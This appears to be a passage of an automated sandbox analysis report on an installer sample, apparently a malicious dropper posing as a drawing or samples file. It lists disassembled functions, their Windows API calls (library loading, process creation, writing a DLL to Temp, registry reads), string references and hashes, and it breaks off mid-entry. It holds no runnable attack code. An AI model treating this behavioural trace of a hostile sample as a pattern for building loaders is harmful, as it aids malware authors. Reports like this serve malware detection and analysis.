                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                                                                      • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                                                                      • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                                                                      • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18
                                                                                      Function 00401F68 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,?), ref: 00401F93
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                        • Part of subcall function 00404E89: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                        • Part of subcall function 00404E89: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,?,00000001,?), ref: 00401FA3
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040201D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2987980305-0
                                                                                      • Opcode ID: bdca3eef77b93f5fb18ef256b874c04e122c56b6ebb898da6ec56c274ac8ae3c
                                                                                      • Instruction ID: 5603d6e3752352f3426b9f4474974a0af609082b15338ddd0508423665d33cd5
                                                                                      • Opcode Fuzzy Hash: bdca3eef77b93f5fb18ef256b874c04e122c56b6ebb898da6ec56c274ac8ae3c
                                                                                      • Instruction Fuzzy Hash: B3210072D04315ABCF207F64CE49A6F79B0AF45358F20423BF601B62D1D7BD49419A5E
                                                                                      Function 004024CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                                                                      • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll, xrefs: 004024DB, 00402500
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWritelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll
                                                                                      • API String ID: 427699356-1718671170
                                                                                      • Opcode ID: f563f17a0cef2154c02f78be3d8b886d91b2262862f67175609af4916b2f3259
                                                                                      • Instruction ID: 6a42f5992006efeb6b2b1e3b7836ad9eb28beba8801b06696a3c4cf9cb3ed08d
                                                                                      • Opcode Fuzzy Hash: f563f17a0cef2154c02f78be3d8b886d91b2262862f67175609af4916b2f3259
                                                                                      • Instruction Fuzzy Hash: ADF0E272A44241BFDB00EBA09E4AAAF7768DB01308F10843FB101F50C2D5FC9A41AB2D
                                                                                      Function 0040534C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 00405371
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040537E
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040535F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                                                      • Instruction ID: 6329997bd1e730a3a29e667b1e1522e50d9b382afe1a637a64c3b3c33ec2f19e
                                                                                      • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                                                      • Instruction Fuzzy Hash: 28E0ECB4900209AFDB009F64DC09E6F7BBDFB00344F00CA21AD11E2150F778E9108EA9
                                                                                      Function 004030BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E3F
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E51
                                                                                        • Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E61
                                                                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 004030DC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 4115351271-1726532035
                                                                                      • Opcode ID: 989f0d5821f87d80d940d59544e2b08c282c9559bcd769a3462913332c2d97c9
                                                                                      • Instruction ID: a6bfa147a109cceda54d2a74a0b449bcdc81c0a47cb146117b691cb1a8044d63
                                                                                      • Opcode Fuzzy Hash: 989f0d5821f87d80d940d59544e2b08c282c9559bcd769a3462913332c2d97c9
                                                                                      • Instruction Fuzzy Hash: 96D09222516D3061D59132263C06FCF1A4D8F8A359F41817BF50A740854A6D1A9289FE
                                                                                      Function 00402188 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405E80: FindFirstFileA.KERNELBASE(?,007A0548,Grundsprogs.but,0040575A,Grundsprogs.but,Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410), ref: 00405E8B
                                                                                        • Part of subcall function 00405E80: FindClose.KERNEL32(00000000), ref: 00405E97
                                                                                      • lstrlenA.KERNEL32 ref: 004021C8
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004021D2
                                                                                      • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: fe9920c73d653bb382b5488afb326a4be2307579c403581ffdf05e2a2fb699af
                                                                                      • Instruction ID: fea5999ed2d29f36f6659ea5ab76f630fbbff02e816614fbb945e9929dcefa88
                                                                                      • Opcode Fuzzy Hash: fe9920c73d653bb382b5488afb326a4be2307579c403581ffdf05e2a2fb699af
                                                                                      • Instruction Fuzzy Hash: 1D115271E04358AADB10EFB9C94999EB7F8EF04354F10853BA505FB2C2D6BDD9008B59
                                                                                      Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                        • Part of subcall function 00404E89: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                        • Part of subcall function 00404E89: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                        • Part of subcall function 0040534C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 00405371
                                                                                        • Part of subcall function 0040534C: CloseHandle.KERNEL32(?), ref: 0040537E
                                                                                      • WaitForSingleObject.KERNEL32(?,?,00000000,000000EB,00000000), ref: 00401E6C
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3521207402-0
                                                                                      • Opcode ID: 25fd9c86a64d1daeba0e3da36de81919d2ae7ea6952b975f12a42877c509ddad
                                                                                      • Instruction ID: f18eb7332cf5c9122d10212b54beee47d15ecdde2804cc733f54deaeffad9b38
                                                                                      • Opcode Fuzzy Hash: 25fd9c86a64d1daeba0e3da36de81919d2ae7ea6952b975f12a42877c509ddad
                                                                                      • Instruction Fuzzy Hash: D2018031900118EBCF10AFA1CD859AE7B71EB00344F10817BFA01B51E1C7B95A81DF9E
                                                                                      Function 00405A63 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,00405CA8,00000000,00000002,?,00000002,?,?,00405CA8,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405A8C
                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA8,?,00405CA8), ref: 00405AAD
                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00405ACE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                      • Instruction ID: 9c835cca2eb0aa0b02c586e78d8c0f4c8809676904daf451fb9b34ef674f496a
                                                                                      • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                      • Instruction Fuzzy Hash: AD015A7154020AEFDF128F64EC84AEB3FACEF18354F044536F955A6260D235E964CFA5
                                                                                      Function 00402438 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 00402479
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 167947723-0
                                                                                      • Opcode ID: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                                                                      • Instruction ID: d28fcdc599a7f9727bcbc73a1b2195d927587ee9f1dfd2233f1a348fd0a26dbd
